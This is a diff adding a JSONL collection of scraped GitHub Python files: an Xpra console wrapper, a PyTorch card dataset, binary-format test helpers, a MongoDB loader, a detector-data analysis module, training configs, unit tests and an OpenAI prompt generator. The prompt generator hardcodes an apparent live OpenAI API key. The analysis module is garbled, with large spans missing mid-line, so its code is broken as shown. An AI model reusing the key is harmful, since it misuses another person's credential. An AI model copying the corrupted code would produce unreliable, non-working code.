diff --git "a/3486.jsonl" "b/3486.jsonl" new file mode 100644--- /dev/null +++ "b/3486.jsonl" @@ -0,0 +1,865 @@ +{"seq_id":"42296682236","text":"import os.path\nimport sys\n\nLOG_FILENAME = \"Xpra.log\"\nREDIRECT_OUTPUT = True\ndef set_redirect_output(on):\n global REDIRECT_OUTPUT\n REDIRECT_OUTPUT = on\ndef set_log_filename(filename):\n global LOG_FILENAME\n LOG_FILENAME = filename\n\ndef fix_unicode_out():\n #code found here:\n #http://stackoverflow.com/a/3259271/428751\n import codecs\n from ctypes import WINFUNCTYPE, windll, POINTER, byref, c_int\n from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR, LPVOID\n\n original_stderr = sys.stderr\n\n # If any exception occurs in this code, we'll probably try to print it on stderr,\n # which makes for frustrating debugging if stderr is directed to our wrapper.\n # So be paranoid about catching errors and reporting them to original_stderr,\n # so that we can at least see them.\n def _complain(message):\n print >>original_stderr, message if isinstance(message, str) else repr(message)\n\n # Work around .\n codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)\n\n # Make Unicode console output work independently of the current code page.\n # This also fixes .\n # Credit to Michael Kaplan \n # and TZOmegaTZIOY\n # .\n try:\n # \n # HANDLE WINAPI GetStdHandle(DWORD nStdHandle);\n # returns INVALID_HANDLE_VALUE, NULL, or a valid handle\n #\n # \n # DWORD WINAPI GetFileType(DWORD hFile);\n #\n # \n # BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);\n\n GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)((\"GetStdHandle\", windll.kernel32))\n STD_OUTPUT_HANDLE = DWORD(-11)\n STD_ERROR_HANDLE = DWORD(-12)\n GetFileType = WINFUNCTYPE(DWORD, DWORD)((\"GetFileType\", windll.kernel32))\n FILE_TYPE_CHAR = 0x0002\n FILE_TYPE_REMOTE = 0x8000\n GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))((\"GetConsoleMode\", windll.kernel32))\n INVALID_HANDLE_VALUE = DWORD(-1).value\n\n def not_a_console(handle):\n if handle == INVALID_HANDLE_VALUE or handle is None:\n return True\n return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR\n or GetConsoleMode(handle, byref(DWORD())) == 0)\n\n old_stdout_fileno = None\n old_stderr_fileno = None\n if hasattr(sys.stdout, 'fileno'):\n old_stdout_fileno = sys.stdout.fileno()\n if hasattr(sys.stderr, 'fileno'):\n old_stderr_fileno = sys.stderr.fileno()\n\n STDOUT_FILENO = 1\n STDERR_FILENO = 2\n real_stdout = (old_stdout_fileno == STDOUT_FILENO)\n real_stderr = (old_stderr_fileno == STDERR_FILENO)\n\n if real_stdout:\n hStdout = GetStdHandle(STD_OUTPUT_HANDLE)\n if not_a_console(hStdout):\n real_stdout = False\n\n if real_stderr:\n hStderr = GetStdHandle(STD_ERROR_HANDLE)\n if not_a_console(hStderr):\n real_stderr = False\n\n if real_stdout or real_stderr:\n # BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,\n # LPDWORD lpCharsWritten, LPVOID lpReserved);\n\n WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)((\"WriteConsoleW\", windll.kernel32))\n\n class UnicodeOutput:\n def __init__(self, hConsole, stream, fileno, name):\n self._hConsole = hConsole\n self._stream = stream\n self._fileno = fileno\n self.closed = False\n self.softspace = False\n self.mode = 'w'\n self.encoding = 'utf-8'\n self.name = name\n self.flush()\n\n def isatty(self):\n return False\n\n def close(self):\n # don't really close the handle, that would only cause problems\n self.closed = True\n\n def fileno(self):\n return self._fileno\n\n def flush(self):\n if self._hConsole is None:\n try:\n self._stream.flush()\n except Exception as e:\n _complain(\"%s.flush: %r from %r\" % (self.name, e, self._stream))\n raise\n\n def write(self, text):\n try:\n if self._hConsole is None:\n if isinstance(text, unicode):\n text = text.encode('utf-8')\n self._stream.write(text)\n else:\n if not isinstance(text, unicode):\n text = str(text).decode('utf-8')\n remaining = len(text)\n while remaining:\n n = DWORD(0)\n # There is a shorter-than-documented limitation on the\n # length of the string passed to WriteConsoleW (see\n # .\n retval = WriteConsoleW(self._hConsole, text, min(remaining, 10000), byref(n), None)\n if retval == 0 or n.value == 0:\n raise IOError(\"WriteConsoleW returned %r, n.value = %r\" % (retval, n.value))\n remaining -= n.value\n if not remaining:\n break\n text = text[n.value:]\n except Exception as e:\n _complain(\"%s.write: %r\" % (self.name, e))\n raise\n\n def writelines(self, lines):\n try:\n for line in lines:\n self.write(line)\n except Exception as e:\n _complain(\"%s.writelines: %r\" % (self.name, e))\n raise\n\n if real_stdout:\n sys.stdout = UnicodeOutput(hStdout, None, STDOUT_FILENO, '')\n else:\n sys.stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno, '')\n\n if real_stderr:\n sys.stderr = UnicodeOutput(hStderr, None, STDERR_FILENO, '')\n else:\n sys.stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno, '')\n except Exception as e:\n _complain(\"exception %r while fixing up sys.stdout and sys.stderr\" % (e,))\n\n\ndef do_init():\n if not REDIRECT_OUTPUT:\n fix_unicode_out()\n return\n global LOG_FILENAME\n from paths import _get_data_dir\n d = _get_data_dir()\n log_file = os.path.join(d, LOG_FILENAME)\n sys.stdout = open(log_file, \"a\")\n sys.stderr = sys.stdout\n","repo_name":"dscho/Xpra","sub_path":"src/xpra/platform/win32/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"27052078484","text":"from PIL import Image\nfrom torchvision.transforms import ToTensor, ToPILImage\nimport os\nimport random\nfrom torch.utils.data import Dataset\n\n\nclass CardsDataset(Dataset):\n def __init__(self, img_dir='data', train=True, transform=None):\n\n self.seeds = [\"bastoni\", \"spade\", \"coppe\", \"denari\"]\n\n self.cards_names = [\"asso\", \"2\", \"3\", \"4\",\"5\",\"6\",\"7\",\"fante\",\"cavallo\",\"re\"]\n self.n_cards = 40\n self.train=train\n self.img_dir = img_dir\n\n if not self.train:\n self.img_dir = self.img_dir+\"/test\"\n\n self.labels={}\n self.img_names = []\n\n self.transform = transform\n self.to_tensor = ToTensor()\n self.to_pil = ToPILImage()\n\n #carica carte\n for seed in self.seeds:\n for j in self.cards_names:\n for i in range(0,self.n_cards):\n str = os.path.join(self.img_dir,\"{}_{}/{}_{}{}.png\".format(j, seed, j, seed, i))\n if os.path.isfile(str):\n self.img_names.append(str)\n self.labels[len(self.img_names)-1]=self.seeds.index(seed)*10+self.cards_names.index(j)\n if self.train:\n print(\"Train\")\n else:\n print(\"Test\")\n print(\"Loaded {}\".format(len(self.img_names)))\n\n def __len__(self):\n return len(self.img_names)\n\n def __getitem__(self, index):\n\n X = Image.open(self.img_names[index])\n\n if self.transform is not None:\n X = self.transform(X)\n\n return X,self.index_to_label(index)\n\n def index_to_label(self,idx):\n return self.labels[idx]\n\n def index_to_string(self, idx):\n return self.img_names[idx].split(\"/\")[1]\n","repo_name":"narder-davide/ProgettoIVU","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2129707303","text":"import pytest\nimport xml.etree.ElementTree as ET\n\nfrom typing import Optional\n\nxfail = pytest.mark.xfail\nskip = pytest.mark.skip\nskipif = pytest.mark.skipif\n\nfrom dingsda import *\nfrom dingsda.errors import *\nfrom dingsda.lib import *\n\nif not ONWINDOWS:\n devzero = open(\"/dev/zero\", \"rb\")\n\nident = lambda x: x\n\ndef raises(func, *args, **kw):\n try:\n return func(*args, **kw)\n except Exception as e:\n return e.__class__\n\n\ndef common(format: Construct, datasample: bytes, objsample: Container, objsample_build: Optional[Container] = None, preprocess: bool = False, **kw):\n r\"\"\"\n :param format: the construct to test\n :param datasample: a sample of the data to parse\n :param objsample: the object that should be parsed from the data\n :param objsample_build: an example object that should produce the same datasample (optional). Used to test Rebuilds.\n :param preprocess: whether to preprocess the data before parsing (optional). Used to test special cases, where it is needed.\n :param kw: additional keyword arguments to pass to the context when parsing and building\n \"\"\"\n # following are implied (re-parse and re-build)\n # assert format.parse(format.build(obj)) == obj\n # assert format.build(format.parse(data)) == data\n obj = format.parse(datasample, **kw)\n assert obj == objsample\n\n build_object = objsample\n if preprocess:\n build_object, extra_info = format.preprocess(objsample, context=kw)\n\n data = format.build(build_object, **kw)\n assert data == datasample\n\n if objsample_build is not None:\n data2 = format.build(obj)\n assert data2 == datasample\n\n\ndef commonhex(format: Construct, hexdata):\n commonbytes(format, binascii.unhexlify(hexdata))\n\n\ndef commondumpdeprecated(format: Construct, filename: str):\n filename = \"tests/deprecated_gallery/blobs/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commondump(format, filename):\n filename = \"tests/gallery/blobs/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commonbytes(format, data):\n obj = format.parse(data)\n data2 = format.build(obj)\n\n\ndef common_xml_test(s, xml, obj, obj_from = None):\n if obj_from is None:\n obj_from = obj\n test_et = ET.fromstring(xml)\n test_obj = s.fromET(xml=test_et)\n assert(obj_from == test_obj)\n test_xml = s.toET(obj=obj, name=\"test\")\n test_xml_str = ET.tostring(test_xml)\n assert(test_xml_str == xml)\n\n\ndef common_endtoend_xml_test(s, byte_data, obj=None, xml=None):\n data = s.parse(byte_data)\n if obj is not None:\n assert(data == obj)\n test_xml = s.toET(obj=data, name=\"test\")\n if xml is not None:\n assert(ET.tostring(test_xml) == xml)\n xml_data = s.fromET(xml=test_xml)\n assert(byte_data == s.build(xml_data))\n\n\ndef size_test(format: Construct, obj: Container, static_size: Optional[int] = None, size: Optional[int] = None, full_size: Optional[int] = None):\n if static_size is not None:\n assert(format.static_sizeof() == static_size)\n if size is not None:\n assert(format.sizeof(obj) == size)\n if full_size is not None:\n assert(format.full_sizeof(obj) == full_size)\n\n assert(static_size is not None or size is not None or full_size is not None)\n","repo_name":"ev1313/dingsda","sub_path":"tests/declarativeunittest.py","file_name":"declarativeunittest.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15630104456","text":"import json\nimport os\n\nfrom monary import Monary\nimport pandas\n\n\ndef load_config(config_path=None):\n if not config_path:\n config_path = os.path.expanduser(\"~\") + \"/.sensible_raw/loader_config.json\"\n\n return json.loads(open(config_path, \"r\").read())\n\n\ndef get_index(index_name, raw_value):\n config = load_config()\n columns, data = load_from_db(\"indices\", index_name, [\"index\"], [\"int32\"], config[\"db_host\"],\n query_spec={\"raw_value\": raw_value})\n if len(data) == 0 or len(data[0]) == 0:\n return -1\n\n return data[0][0]\n\n\ndef docs(data_type):\n pandas.set_option('display.max_colwidth', -1)\n documentation_folder = os.path.abspath(__file__ + \"/../../\")\n return pandas.read_csv(os.path.join(documentation_folder, \"documentation_files\", data_type + \".csv\"))\n\n\ndef get_raw_value(index_name, indexed_value):\n config = load_config()\n columns, data = load_from_db(\"indices\", index_name, [\"raw_value\"], [\"string:100\"], config[\"db_host\"],\n query_spec={\"index\": indexed_value})\n if len(data) == 0 or len(data[0]) == 0:\n return -1\n\n return data[0][0]\n\n\ndef load_data(data_type, month, config=None, as_dataframe=False):\n if not config:\n config = load_config()\n columns, data = load_from_db(data_type,\n month,\n config[\"data_types\"][data_type][\"field_names\"],\n config[\"data_types\"][data_type][\"field_types\"],\n config[\"db_host\"])\n\n if not as_dataframe:\n return columns, data\n\n dict = {}\n for column, array in zip(columns, data):\n dict[column] = array\n return pandas.DataFrame(dict)\n\n\ndef load_from_db(db, collection, field_names, field_types, db_host, query_spec={}):\n with Monary(host=db_host[\"hostname\"], username=db_host[\"username\"], password=db_host[\"password\"],\n database=\"admin\") as monary:\n arrays = monary.query(\n db, # database name\n collection, # collection name\n query_spec, # query spec\n field_names, # field names (in Mongo record)\n field_types # Monary field types (see below)\n )\n\n return field_names, arrays\n","repo_name":"RaduGatej/sensible_raw","sub_path":"sensible_raw/loaders/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37778751991","text":"# Create a while loop that even numbers from 10 until 2\r\n# 10, 8, 6, 4, 2\r\n\r\n#Student ID: 1201200039\r\n#Student Name: Tan Jiue Hong\r\n\r\nstart = 10\r\nwhile (start):\r\n print(start, end=\" \")\r\n start = start - 2\r\n","repo_name":"1201200039/DPL5211Tri2110","sub_path":"Lab 4/Lab 4.2.py","file_name":"Lab 4.2.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3425760062","text":"import numpy as np\nimport tables as tb\nimport logging\nimport numba\nfrom tqdm import tqdm\n\nfrom tjmonopix.analysis import analysis_utils as au\nfrom tjmonopix.analysis import interpreter, event_builder\nfrom pixel_clusterizer.clusterizer import HitClusterizer\n\nlogging.basicConfig(\n format=\"%(asctime)s - [%(name)-8s] - %(levelname)-7s %(message)s\")\nloglevel = logging.INFO\n\n\nclass Analysis():\n def __init__(self, raw_data_file=None, cluster_hits=False, build_events=False, build_events_simple=False):\n\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.setLevel(loglevel)\n\n self.build_events = build_events\n self.build_events_simple = build_events_simple\n if self.build_events and self.build_events_simple:\n raise RuntimeError(\"Please decide for one type of event building only\")\n\n self.raw_data_file = raw_data_file\n self.chunk_size = 200000\n self.cluster_hits = cluster_hits\n if self.cluster_hits:\n self._setup_clusterizer()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def _setup_clusterizer(self):\n ''' Define data structure and settings for hit clusterizer package '''\n\n # Define all field names and data types\n hit_fields = {'event_number': 'event_number',\n 'frame': 'frame',\n 'column': 'column',\n 'row': 'row',\n 'charge': 'charge',\n }\n\n hit_description = [('event_number', ' max_col:\n max_col = hits[i].column\n if hits[i].row < min_row:\n min_row = hits[i].row\n if hits[i].row > max_row:\n max_row = hits[i].row\n\n if max_col - min_col < 8 and max_row - min_row < 8:\n # Make 8x8 array\n col_base = 7 + min_col - center_col\n row_base = 7 + min_row - center_row\n cluster_arr = hit_arr[col_base:col_base + 8,\n row_base:row_base + 8]\n # Finally calculate cluster shape\n # uint64 desired, but numexpr and others limited to int64\n if cluster_arr[7, 7] == 1:\n cluster_shape = np.int64(-1)\n else:\n cluster_shape = np.int64(\n au.calc_cluster_shape(cluster_arr))\n else:\n # Cluster is exceeding 8x8 array\n cluster_shape = np.int64(-1)\n\n clusters[cluster_index].cluster_shape = cluster_shape\n clusters[cluster_index].dist_col = max_col - min_col + 1\n clusters[cluster_index].dist_row = max_row - min_row + 1\n\n def end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index):\n _end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index)\n\n # Define end of cluster function for calculating TDC related cluster properties\n def end_of_cluster_function_tdc(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index):\n _end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index)\n\n # Calculate cluster TDC and cluster TDC status\n cluster_tdc = 0\n cluster_tdc_status = 1 # valid\n for j in range(clusters[cluster_index].n_hits):\n hit_index = cluster_hit_indices[j]\n cluster_tdc += hits[hit_index].tdc_value\n cluster_tdc_status &= (hits[hit_index].tdc_status == 0x00000001) # check for valid TDC status\n clusters[cluster_index].tdc_value = cluster_tdc\n clusters[cluster_index].tdc_status = cluster_tdc_status\n\n # Initialize clusterizer with custom hit/cluster fields\n self.clz = HitClusterizer(\n hit_fields=hit_fields,\n hit_dtype=hit_dtype,\n cluster_fields=cluster_fields,\n cluster_dtype=self.cluster_dtype,\n min_hit_charge=0,\n max_hit_charge=64,\n column_cluster_distance=4,\n row_cluster_distance=4,\n frame_cluster_distance=10,\n ignore_same_hits=True)\n\n# # Set end_of_cluster function for shape and distance calculation\n# if self.analyze_tdc:\n# # If analyze TDC data, set also end of cluster function for calculating TDC properties\n# self.clz.set_end_of_cluster_function(end_of_cluster_function_tdc)\n# else:\n self.clz.set_end_of_cluster_function(end_of_cluster_function)\n\n def analyze_data(self):\n self.analyzed_data_file = self.raw_data_file[:-3] + '_interpreted.h5'\n hit_dtype = [\n ('col', 'u1'),\n ('row', ' 0,\n cluster['cluster_shape'] < 300)\n cs_shape = np.bincount(cluster['cluster_shape'][sel],\n minlength=300)[:300]\n # Add to total hists\n hist_cs_size += cs_size.astype(np.uint32)\n hist_cs_tot += cs_tot.astype(np.uint32)\n hist_cs_shape += cs_shape.astype(np.uint32)\n\n pbar.update(tmp_end - start)\n start = tmp_end\n pbar.close()\n\n # TODO: Copy all attributes properly to output_file, maybe own table\n out_file.root.Dut.attrs.scan_id = in_file.root.meta_data.attrs.scan_id\n self._create_additional_hit_data()\n self.logger.info(\"{:d} errors occured during analysis\".format(data_interpreter.get_error_count()))\n if self.build_events:\n self.logger.info(\"{:d} events built\".format(n_events))\n\n# self._create_additional_hit_data()\n if self.cluster_hits:\n self._create_additional_cluster_data(hist_cs_size, hist_cs_tot, hist_cs_shape)\n\n def _create_additional_hit_data(self):\n with tb.open_file(self.analyzed_data_file, 'r+') as out_file:\n hits = out_file.root.Dut[:]\n scan_id = out_file.root.Dut.attrs[\"scan_id\"]\n\n hist_occ = au.occ_hist2d(hits)\n\n out_file.create_carray(out_file.root,\n name='HistOcc',\n title='Occupancy Histogram',\n obj=hist_occ,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n # TODO: ToT Histogram?\n\n if scan_id in [\"threshold_scan\"]:\n n_injections = 100 # TODO: get from run configuration\n scan_param_range = np.arange(0, self.n_params + 1, 1) # TODO: get from run configuration\n\n hist_scurve = au.scurve_hist3d(hits, scan_param_range)\n\n out_file.create_carray(out_file.root,\n name=\"HistSCurve\",\n title=\"Scurve Data\",\n obj=hist_scurve,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n ave_tots = au.tot_ave3d(hits, scan_param_range)\n ave_tots = np.array(ave_tots, dtype=np.float32) / np.array(hist_scurve, dtype=np.float32)\n out_file.create_carray(out_file.root,\n name=\"ToTAve\",\n title=\"ToT average\",\n obj=ave_tots,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n self.threshold_map, self.noise_map, self.chi2_map = au.fit_scurves_multithread(\n hist_scurve.reshape(112 * 224, self.n_params + 1), scan_param_range, n_injections=n_injections, invert_x=False\n )\n\n out_file.create_carray(out_file.root, name='ThresholdMap', title='Threshold Map', obj=self.threshold_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n out_file.create_carray(out_file.root, name='NoiseMap', title='Noise Map', obj=self.noise_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n out_file.create_carray(out_file.root, name='Chi2Map', title='Chi2 / ndf Map', obj=self.chi2_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n\n def _create_additional_cluster_data(self, hist_cs_size, hist_cs_tot, hist_cs_shape):\n '''\n Store cluster histograms in analyzed data file\n '''\n with tb.open_file(self.analyzed_data_file, 'r+') as out_file:\n out_file.create_carray(out_file.root,\n name='HistClusterSize',\n title='Cluster Size Histogram',\n obj=hist_cs_size,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n out_file.create_carray(out_file.root,\n name='HistClusterTot',\n title='Cluster ToT Histogram',\n obj=hist_cs_tot,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n out_file.create_carray(out_file.root,\n name='HistClusterShape',\n title='Cluster Shape Histogram',\n obj=hist_cs_shape,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n","repo_name":"SiLab-Bonn/tjmonopix-daq","sub_path":"tjmonopix/analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":21733,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"72942155442","text":"import os\nimport sys\nfrom datetime import datetime\nimport time\nimport torch\nimport numpy as np\nimport torch.distributed\nimport torch.backends.cudnn\nimport trainer_distributed as trainer\nimport argparse\nimport random\n\ncfg = {\n \"local_rank\": 0, # will set later\n \"world_size\": 10,\n # const configuration <<<<<<<<<<<<<<<<\n \"log_prefix\": \"./log/\",\n \"tensorboard_logdir\": \"run1/\",\n \"mpi_outdir\": \"mpi/\",\n \"checkpoint_dir\": \"checkpoint/\",\n \"unique_id\": \"FinalLDI\",\n\n \"write_validate_result\": True,\n \"validate_num\": 64,\n \"valid_freq\": 2000,\n \"train_report_freq\": 20,\n\n # about training <<<<<<<<<<<<<<<<\n # comment of current epoch, will print on config.txt\n \"id\": \"\",\n \"comment\": \"\",\n\n \"trainset\": \"m+r+s_seq\",\n \"evalset\": \"stereovideo_seq\",\n \"model_name\": \"LDI\",\n \"modelloss_name\": \"fulljoint\",\n \"batch_size\": 1,\n \"num_epoch\": 500,\n \"savepth_iter_freq\": 400,\n \"lr\": 2e-4,\n \"lr_milestones\": [12e3, 24e3, 36e3],\n \"lr_values\": [0.5, 0.25, 0.125],\n \"check_point\": {\n \"\": \"FinalLDI_r0.pth\"\n },\n \"loss_weights\": {\n \"pixel_loss_cfg\": 'l1',\n \"pixel_loss\": 1,\n \"net_smth_loss\": 0.5,\n \"depth_loss\": 1,\n \"flownet_dropout\": 1,\n\n \"bg_supervision\": 0.1,\n\n \"scale_mode\": \"adaptive\",\n # \"scale_scaling\": 1,\n\n \"upmask_magaware\": True,\n \"mask_warmup\": 1,\n \"mask_warmup_milestone\": [1e18, 2e18],\n # \"bgflow_warmup\": 1,\n # \"bgflow_warmup_milestone\": [2e3, 4e3],\n # \"aflow_fusefgpct\": False,\n\n # \"tempnewview_mode\": \"biflow\",\n # \"tempnewview_loss\": 0,\n },\n}\n\n\n# TODO\n# * List:\n# implement LDI (either train in Kitti or implement LDI and train in my dataset (former is easier))\n# adjust my model until that problem is resolved\n# * Implement:\n# temporal consistency - learning blind temporal consistency - running\n# temporal consistency - blind + dvp\n# temporal consistency - naive filtering in original resolution\n# novel view synthesis - LDI [+temp]\n# novel view synthesis - MPI [+temp]\n# depth from video - WSVD - ok\n# depth from video - MiDaVS - ok\n# depth from video - MannequinChanllenge (single-frame methods) - ok\n# * When have free time:\n# temporal consistency - blind temporal consistency\n# depth from video - MannequinChanllenge (two-frame methods)\n# novel view synthesis - 3D Ken-Burn\n# novel view synthesis - Synsin\n# * Evaluator:\n# run in realtime\n\n\ndef main(cfg):\n \"\"\"\n Please specify the id and comment!!!!!!!!!\n \"\"\"\n cfg[\"id\"] = \"FinalLDI\"\n cfg[\"comment\"] = \"use the final stereo_video as test\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--local_rank\", type=int)\n args = parser.parse_args()\n cfg[\"local_rank\"] = args.local_rank\n\n # the settings for debug\n # please comment this\n if \"LOGNAME\" in os.environ.keys() and os.environ[\"LOGNAME\"] == 'jrchan':\n print(\"Debug Mode!!!\", flush=True)\n cfg[\"comment\"] = \"Dont't forget to change comment\" * 50\n cfg[\"world_size\"] = 2\n cfg[\"train_report_freq\"] = 1\n cfg[\"valid_freq\"] = 20\n else:\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n print(\"Cuda available devices:\")\n devices_num = torch.cuda.device_count()\n for device in range(devices_num):\n print(f\"{device}: {torch.cuda.get_device_name(device)}\")\n print(f\"------------- start running (PID: {os.getpid()} Rank: {cfg['local_rank']})--------------\", flush=True)\n torch.cuda.set_device(cfg[\"local_rank\"])\n\n seed = np.random.randint(0, 10000)\n print(f\"RANK_{cfg['local_rank']}: random seed = {seed}\")\n cfg[\"comment\"] += f\", random seed = {seed}\"\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n np.random.seed(seed)\n random.seed(seed)\n torch.distributed.init_process_group('nccl', world_size=cfg[\"world_size\"], init_method='env://')\n\n trainer.train(cfg)\n\n\nif __name__ == \"__main__\":\n main(cfg)\n","repo_name":"limacv/mono_mpv","sub_path":"main_train_ddp.py","file_name":"main_train_ddp.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"35220475839","text":"import unittest\n\nimport messages\nfrom monitor import Monitor\n\n\nclass DummyConnection(object):\n next_msg = None\n sent_msg = None\n\n def __init__(self):\n pass\n\n def send_message(self, msg):\n self.sent_msg = msg\n\n def get_message(self):\n return self.next_msg\n\n\nclass TestPack(unittest.TestCase):\n\n def test_login(self):\n m = messages.LoginMessage()\n self.assertEqual(m.pack(), b'')\n\n def test_stats(self):\n m = messages.StatsMessage(1234, b'Name:Me\\nMaxJobs:4')\n self.assertEqual(m.pack(),\n b'\\x00\\x00\\x04\\xd2'\n b'\\x00\\x00\\x00\\x11'\n b'Name:Me\\nMaxJobs:4\\x00'\n )\n\n def test_local_job_begin(self):\n m = messages.LocalJobBeginMessage(1001, 2001, 0, b'test_file.c')\n self.assertEqual(m.pack(),\n b'\\x00\\x00\\x07\\xd1' # Job ID: 2001\n b'\\x00\\x00\\x03\\xe9' # Client ID: 1001\n b'\\x00\\x00\\x00\\x00' # Timestamp.\n b'\\x00\\x00\\x00\\x0b' # Filename length.\n b'test_file.c\\x00' # Filename.\n )\n\n def test_local_job_done(self):\n m = messages.LocalJobDoneMessage(2001)\n self.assertEqual(m.pack(), b'\\x00\\x00\\x07\\xd1')\n\n\nclass TestMonitor(unittest.TestCase):\n\n def test_negative_jobs(self):\n \"\"\"Test that a CS can't go into negative active jobs.\"\"\"\n m = Monitor(DummyConnection())\n\n # Receive JobBeign messages before CS Stats.\n m.handleGetCS(messages.GetCSMessage(\"file.c\", 1, 1, 201))\n m.handleJobBegin(messages.JobBeginMessage(1, 0, 101))\n\n # Activate the CS.\n stats = messages.StatsMessage(101, b'')\n stats.data[\"Name\"] = \"cs1\"\n stats.data[\"IP\"] = \"1.1.1.1\"\n stats.data[\"MaxJobs\"] = \"4\"\n m.handleStats(stats)\n\n # Receive a JobDone twice for the same job.\n m.handleJobDone(messages.JobDoneMessage(1, 0,\n 0, 0, 0, 0, # We don't care\n 0, 0, 0, 0, 0)) # about these.\n m.handleJobDone(messages.JobDoneMessage(1, 0,\n 0, 0, 0, 0, # We don't care\n 0, 0, 0, 0, 0)) # about these.\n self.assertEqual(m.cs[101].active_jobs(), 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rynorris/pyicemon","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22137677132","text":"import json\nimport openai\nimport copy\nfrom openai.error import RateLimitError\nimport backoff\nfrom tqdm import tqdm\n\nqna_path_yesno = \"CPL-master/CPL/prompt/infilled_template/yesno.json\"\n\nwith open(qna_path_yesno) as f:\n #data = [json.loads(line) for line in f]\n data=json.load(f)\n \n\n \nopenai.api_key = \"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\"\n\ninitial_prompt=\"Q:is this a creamy soup?/nA1:this is a creamy soup/nA2:this is not a creamy soup/n\"\n#print(initial_prompt)\n\nprompts=[initial_prompt+\"Q:\"+dat[\"question\"]+\"/nA1:\"+dat[\"prompt\"]+\"/nA2:\" for idx,dat in enumerate(data)]\n\nall_responses=[]\n\n#prompts=prompts[10000:30000]\n\n\n@backoff.on_exception(backoff.expo, RateLimitError)\ndef completions_with_backoff(curr_prompt):\n response = openai.Completion.create(\n #engine=\"text-davinci-003\",\n engine=\"text-curie-001\",\n prompt=curr_prompt,\n temperature=0,\n max_tokens = 85,\n n=1,\n stop=\".\"\n ) \n return response\n\n\nfor curr_prompt in tqdm(prompts):\n \n\n response = completions_with_backoff(curr_prompt)\n all_responses.append(response[\"choices\"][0][\"text\"])\n\nnew_data=copy.deepcopy(data)\n\nj=0\nstart = 0 \nend=len(new_data)\nfor i in range(start,end):\n new_data[i][\"prompt2\"] = all_responses[j]\n j+=1\n\n#with open(\"new_file_opt_10000_to_30000.json.json\", 'w') as f:\nwith open(\"new_file_gpt_all.json.json\", 'w') as f:\n\tjson.dump(new_data, f)\n\n","repo_name":"kshama2705/MC-VQA-using-customized-prompts","sub_path":"yes_no_qn_prompt_gen.py","file_name":"yes_no_qn_prompt_gen.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31251948432","text":"import datetime\nimport threading\nimport time\nfrom typing import Any\nimport requests\nimport json\nimport getapi\nimport mate\n\n\n\nrun_list =[]\n#写一个方法 把参数[小时,分,秒]转换为秒\ndef run_time(hour,minute,second):\n return 